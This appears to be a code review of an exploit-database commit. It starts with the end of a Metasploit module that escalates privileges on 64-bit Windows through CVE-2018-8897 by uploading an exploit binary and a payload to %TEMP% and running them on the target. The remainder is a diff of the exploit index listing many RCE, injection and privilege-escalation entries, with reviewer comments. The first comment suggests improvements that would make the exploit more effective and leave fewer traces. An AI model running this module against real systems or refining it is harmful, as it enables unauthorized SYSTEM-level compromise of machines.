'License' => MSF_LICENSE,
'Author' =>
[
'Nick Peterson', # Original discovery (@nickeverdox)
'Nemanja Mulasmajic', # Original discovery (@0xNemi)
'Can Bölük <can1357>', # PoC
'bwatters-r7' # msf module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 08 2018',
'References' =>
[
['CVE', '2018-8897'],
['EDB', '44697'],
['BID', '104071'],
['URL', 'https://github.com/can1357/CVE-2018-8897/'],
['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'False'
}
))

register_options([
OptString.new('EXPLOIT_NAME',
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('PATH',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXECUTE_DELAY',
[false, 'The number of seconds to delay before executing the exploit', 3])
])
end

def setup
super
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@payload_path = "#{temp_path}\\#{payload_name}"
@exploit_path = "#{temp_path}\\#{exploit_name}"
@payload_exe = generate_payload_exe
end

def validate_active_host
begin
host = session.session_host
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end

def validate_remote_path(path)
unless directory?(path)
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
end
end

def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end

def ensure_clean_destination(path)
if file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end
end
end

def ensure_clean_exploit_destination
ensure_clean_destination(exploit_path)
end

def ensure_clean_payload_destination
ensure_clean_destination(payload_path)
end

def upload_exploit
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
upload_file(exploit_path, local_exploit_path)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
end

def upload_payload
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
end

def execute_exploit
sleep(datastore['EXECUTE_DELAY'])
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
vprint_status(output)
end

def exploit
begin
validate_active_host
validate_target
validate_remote_path(temp_path)
ensure_clean_exploit_destination
ensure_clean_payload_destination
upload_exploit
upload_payload
execute_exploit
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
ensure_clean_exploit_destination
ensure_clean_payload_destination
end
end

attr_reader :exploit_name
attr_reader :payload_name
attr_reader :payload_exe
attr_reader :temp_path
attr_reader :payload_path
attr_reader :exploit_path
end
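Review bot: in `exploit`, the two cleanup calls `ensure_clean_exploit_destination` / `ensure_clean_payload_destination` run only in the `rescue` branch, so after a successful run the uploaded exploit binary and payload EXE stay behind in %TEMP% on the target; move them into an `ensure` block (or call them after `execute_exploit`) so both paths remove the files. Further points in the same hunk: `host = session.session_host` in `validate_active_host` is assigned and never used; `require 'msf/core/post/windows/registry'` is loaded but `Msf::Post::Windows::Registry` is never included; `validate_target` never checks whether the session is already elevated although `Msf::Post::Windows::Priv` is included (an early `is_system?` check would avoid running the kernel exploit needlessly); and the description has two typos ("kerneles", "excpetions") and calls a local privilege elevation "remote code execution".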
@ -6016,6 +6016,7 @@ id,file,description,date,author,type,platform,port
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9812,6 +9813,7 @@ id,file,description,date,author,type,platform,port
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16608,11 +16610,15 @@ id,file,description,date,author,type,platform,port
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
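Review bot: the renames of 44992 and 45005 drop "Unauthenticated" from the description, while the new 45025 entry in the same hunk keeps "Unauthenticated Command Execution" and 45020 uses the parenthesised form "(Authenticated)"; pick one convention for the authentication qualifier and apply it to all three. Also, the new 45018 entry spells the vendor "Manage Engine" whereas the existing 44975 entry further down in this commit uses "ManageEngine"; the two should agree so searches match both.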
@ -26049,7 +26055,7 @@ id,file,description,date,author,type,platform,port
18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php,
18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php,
18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,
18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
18480,exploits/php/webapps/18480.txt,"Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php,
18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,hardware,
18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,
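Review bot: the rename of 18480 keeps the version string "Dolibarr ERP/CRM 3.2.0 < Alpha", which reads as a malformed range; the same release appears later in this commit as "Dolibarr ERP/CRM 3.2 Alpha" (entry 36873), so "3.2.0 Alpha" or "3.2 Alpha" is probably what is meant and this rename is the moment to fix it.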
@ -26149,7 +26155,7 @@ id,file,description,date,author,type,platform,port
18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,
18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi,
18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php,
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php,
@ -30956,7 +30962,7 @@ id,file,description,date,author,type,platform,port
28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php,
28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php,
28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix,
28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios,
28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,
@ -34015,7 +34021,7 @@ id,file,description,date,author,type,platform,port
34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
34007,exploits/php/webapps/34007.txt,"Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php,
34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php,
@ -35052,7 +35058,7 @@ id,file,description,date,author,type,platform,port
35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php,
35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php,
35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35651,exploits/php/webapps/35651.txt,"Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php,
35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php,
35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php,
@ -35476,9 +35482,9 @@ id,file,description,date,author,type,platform,port
36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php,
36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php,
36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php,
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
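Review bot: the three renamed entries 36331-36333 now say "3.1.0", while the unchanged neighbour 36330 ("Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities", same author and date) still says "3.1"; align the version notation across the four High-Tech Bridge entries in this block.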
@ -35715,7 +35721,7 @@ id,file,description,date,author,type,platform,port
36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36683,exploits/php/webapps/36683.txt,"Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php,
@ -35831,7 +35837,7 @@ id,file,description,date,author,type,platform,port
36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware,
36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php,
36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php,
36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
36873,exploits/php/webapps/36873.txt,"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,
36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php,
@ -39554,7 +39560,7 @@ id,file,description,date,author,type,platform,port
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection",2018-05-30,Sysdream,webapps,php,80
44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
@ -39634,12 +39640,13 @@ id,file,description,date,author,type,platform,port
|
|||
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
|
||||
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
|
||||
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
|
||||
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
|
||||
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
|
||||
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
|
||||
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
|
||||
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
|
||||
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
|
||||
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
|
||||
44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
|
||||
45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80
|
||||
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
|
||||
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
|
||||
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
|
||||
|
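Review bot: In this hunk (@ -39634,12 +39640,13) the new row 45014 (WAGO e!DISPLAY 7300T, dated 2018-07-13) is inserted between 44978 and 44981, which breaks the ascending id order that the rest of this hunk and the following hunk keep (45002, 45003, 45007, 45015, 45016, 45022). Move it into the final hunk between 45007 and 45015 so the file stays sorted by id; its columns themselves (file path, date, author, type, platform, port 80) match the format of the neighbouring rows and need no change.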
@ -39650,3 +39657,6 @@ id,file,description,date,author,type,platform,port
|
|||
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
|
||||
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
|
||||
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
|
||||
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
|
||||
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
|
||||
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
|
||||
|
|